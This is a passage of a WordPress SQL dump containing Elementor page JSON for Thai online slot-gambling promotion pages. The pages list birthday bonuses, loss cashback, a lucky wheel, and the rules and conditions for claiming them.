\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\/\\u0e27\\u0e31\\u0e19\\/\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"82869dd\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/mgbline.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"174fb16\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"498b0c4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/HBD_-_Megabet333-Biz.webp\",\"id\":159,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ae3dca7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy Birthday Bonus \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d7acfa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\ud83c\\udf81 \\u0e09\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14 \\u0e23\\u0e31\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e02\\u0e27\\u0e31\\u0e0d\\u0e15\\u0e32\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e19\\u0e31\\u0e49\\u0e19 <br \\/>(\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14)<\\/p><ul><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1480\\\" data-end=\\\"1496\\\">3,000 \\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b<\\/strong> \\u2192 <strong data-start=\\\"1499\\\" data-end=\\\"1513\\\">\\u0e23\\u0e31\\u0e1a\\u0e1f\\u0e23\\u0e35 300<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1529\\\" data-end=\\\"1542\\\">500\\u20132,999<\\/strong> \\u2192 <strong data-start=\\\"1545\\\" data-end=\\\"1555\\\">\\u0e23\\u0e31\\u0e1a 50<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1571\\\" data-end=\\\"1586\\\">\\u0e44\\u0e21\\u0e48\\u0e40\\u0e01\\u0e34\\u0e19 500<\\/strong> \\u2192 <strong data-start=\\\"1589\\\" data-end=\\\"1616\\\">\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 100%<\\/strong><\\/li><\\/ul><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1634\\\" data-end=\\\"1680\\\"><strong data-start=\\\"1634\\\" data-end=\\\"1653\\\">\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 5 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong>, <strong data-start=\\\"1655\\\" data-end=\\\"1678\\\">\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"1634\\\" data-end=\\\"1680\\\">\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e42\\u0e14\\u0e22 <strong data-start=\\\"1699\\\" data-end=\\\"1727\\\">\\u0e41\\u0e08\\u0e49\\u0e07\\u0e1a\\u0e31\\u0e15\\u0e23\\u0e1b\\u0e23\\u0e30\\u0e0a\\u0e32\\u0e0a\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e97b605\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/mgbline.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9947189\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"b558a2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"0d72c4a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Reward_10_-_Megabet333-Biz.webp\",\"id\":160,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"54c71af\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 10%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"234d7b8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1088\\\" data-end=\\\"1118\\\">\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32! \\u0e23\\u0e30\\u0e1a\\u0e1a <strong data-start=\\\"1844\\\" data-end=\\\"1878\\\">\\u0e41\\u0e1b\\u0e25\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21 Reward 10%<\\/strong> <br \\/>\\u0e19\\u0e33\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e1b\\u0e25\\u0e38\\u0e49\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e08\\u0e30\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49 \\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e41\\u0e25\\u0e01\\u0e41\\u0e15\\u0e49\\u0e21<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e04\\u0e34\\u0e14\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e1b\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e0b\\u0e47\\u0e19\\u0e15\\u0e4c\\u0e08\\u0e32\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2a\\u0e38\\u0e17\\u0e18\\u0e34 \\u0e15\\u0e32\\u0e21\\u0e23\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e33\\u0e2b\\u0e19\\u0e14<\\/li><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e2a\\u0e14\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e19\\u0e33\\u0e44\\u0e1b\\u0e41\\u0e25\\u0e01\\u0e15\\u0e32\\u0e21\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e25\\u0e01\\u0e43\\u0e19\\u0e02\\u0e13\\u0e30\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5ce39e5\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/mgbline.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"21cd1ab\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"879b024\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Lucky_wheel_-_Megabet333-Biz.webp\",\"id\":156,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b5fc02\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lucky Wheel \\u0e01\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e42\\u0e0a\\u0e04 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a328cdd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e41\\u0e15\\u0e49\\u0e21 <strong data-start=\\\"75\\\" data-end=\\\"85\\\">Reward<\\/strong> \\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 <br \\/>\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e41\\u0e25\\u0e49\\u0e27\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e08\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19<\\/p><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"197\\\" data-end=\\\"250\\\">20 \\/ 50 \\/ 100 \\/ 150 \\/ 200 \\/ 250 \\/ 300 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a<\\/strong><\\/li><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"255\\\" data-end=\\\"275\\\">\\ud83c\\udf81 Mystery Prize<\\/strong>\\u00a0\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 (\\u0e40\\u0e0a\\u0e48\\u0e19 500 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15 <strong data-start=\\\"310\\\" data-end=\\\"318\\\">\\u0e2b\\u0e23\\u0e37\\u0e2d<\\/strong> \\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 +1)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5aae432\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/mgbline.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d6f8124\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4ce4610\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"9e70ab2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e27\\u0e34\\u0e18\\u0e35\\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e921159\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2531\\\" data-end=\\\"2570\\\">\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a \\u2192 \\u0e44\\u0e1b\\u0e17\\u0e35\\u0e48\\u0e40\\u0e21\\u0e19\\u0e39 <strong data-start=\\\"2555\\\" data-end=\\\"2568\\\">\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19<\\/strong><\\/li><li data-start=\\\"2574\\\" data-end=\\\"2643\\\">\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e14 <strong data-start=\\\"2599\\\" data-end=\\\"2614\\\">\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c<\\/strong> (\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e41\\u0e08\\u0e49\\u0e07\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e15\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38)<\\/li><li data-start=\\\"2647\\\" data-end=\\\"2706\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e40\\u0e02\\u0e49\\u0e32 <strong data-start=\\\"2662\\\" data-end=\\\"2675\\\">\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34<\\/strong> \\/ \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e33\\u0e40\\u0e23\\u0e47\\u0e08<\\/li><li data-start=\\\"2710\\\" data-end=\\\"2741\\\">\\u0e15\\u0e23\\u0e27\\u0e08\\u0e2a\\u0e2d\\u0e1a\\u0e2a\\u0e16\\u0e32\\u0e19\\u0e30\\u0e44\\u0e14\\u0e49\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e27\\u0e31\\u0e15\\u0e34\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3257b34\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"076795c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"87a05f6\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9781422\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2092\\\" data-end=\\\"2176\\\">\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a <strong data-start=\\\"2109\\\" data-end=\\\"2138\\\">1 \\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49\\/1 \\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c\\/1 \\u0e44\\u0e2d\\u0e1e\\u0e35<\\/strong> \\u0e2b\\u0e49\\u0e32\\u0e21\\u0e43\\u0e0a\\u0e49\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\u0e17\\u0e38\\u0e01\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a<\\/li><li data-start=\\\"2179\\\" data-end=\\\"2301\\\">\\u0e01\\u0e32\\u0e23\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"2201\\\" data-end=\\\"2237\\\">\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e44\\u0e1b\\u0e15\\u0e32\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e02\\u0e2d\\u0e07 naijan<\\/strong> \\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 (\\u0e2b\\u0e32\\u0e01\\u0e21\\u0e35\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e41\\u0e08\\u0e49\\u0e07\\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21)<\\/li><li data-start=\\\"2304\\\" data-end=\\\"2404\\\">\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e43\\u0e14\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07 \\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e22\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e46 \\u0e41\\u0e25\\u0e30 <strong data-start=\\\"2365\\\" data-end=\\\"2385\\\">\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e1b\\u0e23<\\/strong> \\u0e22\\u0e01\\u0e40\\u0e27\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38\\u0e44\\u0e27\\u0e49<\\/li><li data-start=\\\"2407\\\" data-end=\\\"2499\\\">naijan <strong data-start=\\\"2414\\\" data-end=\\\"2445\\\">\\u0e02\\u0e2d\\u0e2a\\u0e07\\u0e27\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e38\\u0e07\\/\\u0e22\\u0e01\\u0e40\\u0e25\\u0e34\\u0e01<\\/strong> \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e1b\\u0e0f\\u0e34\\u0e40\\u0e2a\\u0e18\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e2b\\u0e32\\u0e01\\u0e15\\u0e23\\u0e27\\u0e08\\u0e1e\\u0e1a\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\/\\u0e1c\\u0e34\\u0e14\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2189,309,'_thumbnail_id','282'),(2193,310,'_elementor_edit_mode','builder'),(2194,310,'_elementor_template_type','wp-page'),(2195,310,'_elementor_version','3.32.5'),(2196,310,'_elementor_pro_version','3.32.3'),(2197,310,'_wp_page_template','default'),(2198,310,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2199,310,'_elementor_data','[{\"id\":\"d070aea\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4d6b9b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db612d4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 YOK789 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% 